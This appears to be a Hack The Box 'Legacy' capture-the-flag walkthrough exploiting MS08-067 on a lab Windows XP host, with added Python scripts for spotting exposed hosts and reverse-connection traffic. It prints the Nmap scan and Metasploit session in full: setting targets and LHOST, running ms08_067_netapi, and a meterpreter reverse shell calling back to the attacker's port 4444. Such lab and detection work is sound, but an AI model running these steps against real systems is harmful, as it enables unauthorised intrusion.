HTB Legacy
Hack The Box's Legacy is an Easy machine that features CVE-2008-4250 (MS08-067), a vulnerability first disclosed in 2008 that affected Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems. It allows remote code execution if the target receives a specially crafted RPC request. You can learn more about this vulnerability's CVE details here.
After starting the machine on HTB and connecting to your HTB VPN, open a terminal and ping the machine's IP address to confirm it is reachable. Make sure the IP address you enter matches the one displayed on HTB when you boot the target machine.
ping 10.129.141.229
You should receive replies from the IP address. Press CTRL + C to stop sending packets to the target host. Once you have confirmed the host is reachable, it's time to move on to enumeration with Nmap.
Start with a quick service scan using Nmap. The -sC switch runs Nmap's default script set and -sV enables service version detection on the open ports. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should receive the following output in your terminal:
nmap -sC -sV -Pn 10.129.141.229
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 21:53 GMT
Nmap scan report for 10.129.141.229
Host is up (0.0043s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:6f:40 (VMware)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-03-29T02:51:07+03:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.51 seconds
Port 445 is open and its service banner identifies the host as Windows XP. The Host script results section adds more detail: SMB2 negotiation failed, so the host only speaks SMBv1, and message signing is disabled. I suggest using your favorite search engine to always do some research on services running on open ports and their vulnerabilities. After doing some searching, we find we can exploit this using the MS08-067 Microsoft Server Service Relative Path Stack Corruption Metasploit module.
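The scan above is also the evidence a defender would use to find hosts like this before an attacker does. The following script is an added example, not part of the original walkthrough: it parses Nmap's normal (non-XML) output for the indicators in the scan (SMB reachable, an OS in the CVE-2008-4250 advisory's scope, SMBv1-only negotiation, signing disabled) and rolls them up into a triage verdict. The SAMPLE_SCAN text is a constructed, abridged copy of the output shown above; the function names and the VULNERABLE_OS list are my own.

```python
"""Triage Nmap output for MS08-067 (CVE-2008-4250) exposure.

Added example, not part of the original walkthrough. It parses the text
Nmap prints with -sC -sV and reports the indicators a defender would want
to catch in their own scans: SMB reachable, an OS in the advisory's scope,
SMBv1-only negotiation and signing disabled.
"""
import re

# Constructed sample: an abridged copy of the scan output shown in the post.
SAMPLE_SCAN = """\
Nmap scan report for 10.129.141.229
Host is up (0.0043s latency).
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
"""

# Matches port-table rows such as "139/tcp  open   netbios-ssn   Microsoft ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Platforms named in the MS08-067 / CVE-2008-4250 advisory.
VULNERABLE_OS = ("windows 2000", "windows xp", "windows server 2003")
SMB_PORTS = (139, 445)


def parse_scan(text):
    """Return (open_ports, facts) from Nmap's normal (non-XML) output."""
    open_ports = {}
    facts = {"os": "", "smb2": True, "signing": ""}
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, _, state, service, version = m.groups()
            if state == "open":
                open_ports[int(port)] = (service, version or "")
            continue
        # NSE script lines are prefixed with "| ", "|_" and indentation.
        field = line.lstrip("|_ ").strip()
        if field.startswith("OS:"):
            facts["os"] = field[3:].strip()
        elif field.startswith("smb2-time: Protocol negotiation failed"):
            facts["smb2"] = False          # host does not speak SMB2 or later
        elif field.startswith("message_signing:"):
            facts["signing"] = field.split(":", 1)[1].strip()
    return open_ports, facts


def assess(open_ports, facts):
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = []
    if any(p in open_ports for p in SMB_PORTS):
        findings.append("SMB reachable on 139/445: Server service is exposed")
    if any(name in facts["os"].lower() for name in VULNERABLE_OS):
        findings.append("OS within CVE-2008-4250 scope: " + facts["os"])
    if not facts["smb2"]:
        findings.append("SMB2 negotiation failed: host is SMBv1-only")
    if facts["signing"].startswith("disabled"):
        findings.append("SMB message signing disabled")
    return findings


def ms08_067_candidate(text):
    """True when SMB is reachable AND the OS is one the advisory covers.

    This is an exposure check from scan evidence, not proof: the host may
    already carry the MS08-067 update (KB958644), which only a patch
    inventory or an authenticated check can confirm.
    """
    open_ports, facts = parse_scan(text)
    findings = assess(open_ports, facts)
    return any("SMB reachable" in f for f in findings) and \
        any("CVE-2008-4250 scope" in f for f in findings)


if __name__ == "__main__":
    ports, info = parse_scan(SAMPLE_SCAN)
    for finding in assess(ports, info):
        print("-", finding)
    print("MS08-067 candidate:", ms08_067_candidate(SAMPLE_SCAN))
```

Feed it the saved output of `nmap -sC -sV -oN scan.txt <host>` for each host in a subnet and the candidates are the ones to patch or isolate first; an SMBv1-only host with signing disabled is a finding on its own even where the OS string is unreadable.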
Open Metasploit in a new terminal by typing "msfconsole".
msfconsole
[ASCII art banner omitted]

       =[ metasploit v6.1.9-dev                          ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: View all productivity tips with the tips command

msf6 >
Let's search for the MS08-067 exploit using the "search" command.
msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
Metasploit returns a single match, which is the one we are looking for: exploit/windows/smb/ms08_067_netapi. To load an exploit, type "use" followed by the exploit's index number from the search results (or its full module name).
Once the exploit has loaded, type "options" and hit Enter. This lists the exploit's options, which we will need to configure.
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     157.245.81.12    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf6 exploit(windows/smb/ms08_067_netapi) >
The RHOSTS option is blank but required to run the exploit. Set it by typing "set RHOSTS" followed by the IP of the target machine and hitting Enter. Metasploit echoes a confirmation line with the RHOSTS value.
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.141.229
RHOSTS => 10.129.141.229
msf6 exploit(windows/smb/ms08_067_netapi) >
RPORT is already correctly set to 445. You may need to change the payload options LHOST and LPORT if you are using a VPN, a virtual machine, or the HTB Pwnbox, since the target connects back to LHOST. Most of the time this just means entering "set LHOST" followed by your interface name, usually "tun0". With everything set, run the exploit by typing "run" and hitting Enter.
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.51:4444
[*] 10.129.141.229:445 - Automatically detecting the target...
[*] 10.129.141.229:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.141.229:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.141.229:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 10.129.141.229
[*] Meterpreter session 1 opened (10.10.14.51:4444 -> 10.129.141.229:1071) at 2022-03-23 22:08:22 +0000

meterpreter >
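The session line above shows the shape of what a network defender can detect: the target received SMB traffic on 445 and then, seconds later, opened its own TCP connection back to the same peer on 4444. The script below is an added example, not part of the original walkthrough, that pairs the two directions in flow records. The SAMPLE_FLOWS records are constructed (the addresses and ports follow the session shown above, the timestamps and the CSV layout are made up), and the five-minute window is an assumption to tune for your own environment.

```python
"""Pair inbound SMB with a reverse connection from the same host.

Added example, not part of the original walkthrough. The module run above
delivers windows/meterpreter/reverse_tcp: after the crafted SMB request
arrives on 445, the victim itself opens a TCP connection back to the
attacker's handler (10.129.141.229:1071 -> 10.10.14.51:4444 in the post).
A server that initiates a connection to a peer that just spoke SMB to it
is a simple, payload-agnostic indicator worth alerting on.
"""
from datetime import datetime, timedelta

# Constructed flow records: start_time,src,sport,dst,dport. The addresses
# and ports follow the session in the post; timestamps are made up.
SAMPLE_FLOWS = """\
2022-03-23T22:08:15Z,10.10.14.51,52144,10.129.141.229,445
2022-03-23T22:08:16Z,10.10.14.51,52150,10.129.141.229,445
2022-03-23T22:08:22Z,10.129.141.229,1071,10.10.14.51,4444
2022-03-23T22:09:40Z,10.129.141.229,1072,10.129.1.5,53
"""

SMB_PORTS = (139, 445)


def parse_flows(text):
    """Return a list of (time, src, sport, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split(",")
        flows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                      src, int(sport), dst, int(dport)))
    return flows


def find_callbacks(flows, window=timedelta(minutes=5)):
    """Return (server, peer, callback_port, seconds_after_smb) hits.

    A hit is an outbound connection from `server` to `peer` on a non-SMB
    port that starts within `window` of the peer's latest inbound SMB
    connection to that server. The window length is an assumption.
    """
    last_smb_in = {}   # (server, peer) -> time of latest inbound SMB flow
    hits = []
    for ts, src, sport, dst, dport in sorted(flows):
        if dport in SMB_PORTS:
            last_smb_in[(dst, src)] = ts      # peer src spoke SMB to dst
            continue
        seen = last_smb_in.get((src, dst))    # src now connects out to dst
        if seen is not None and timedelta(0) <= ts - seen <= window:
            hits.append((src, dst, dport, int((ts - seen).total_seconds())))
    return hits


if __name__ == "__main__":
    for server, peer, port, delay in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(f"{server} connected back to {peer}:{port} {delay}s after SMB")
```

The rule keys on direction rather than on port 4444, so changing the handler port does not evade it; on a real network, allow-list peers that legitimately both talk SMB to a server and receive connections from it (backup agents, management consoles) before turning the hits into alerts.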
We got a Meterpreter session! Type "shell" and hit Enter to get a command shell on the target system.
meterpreter > shell
Process 884 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
You can now navigate the target system to collect the user and root .txt flags, which are located in the user's and the Administrator's Desktop folders respectively.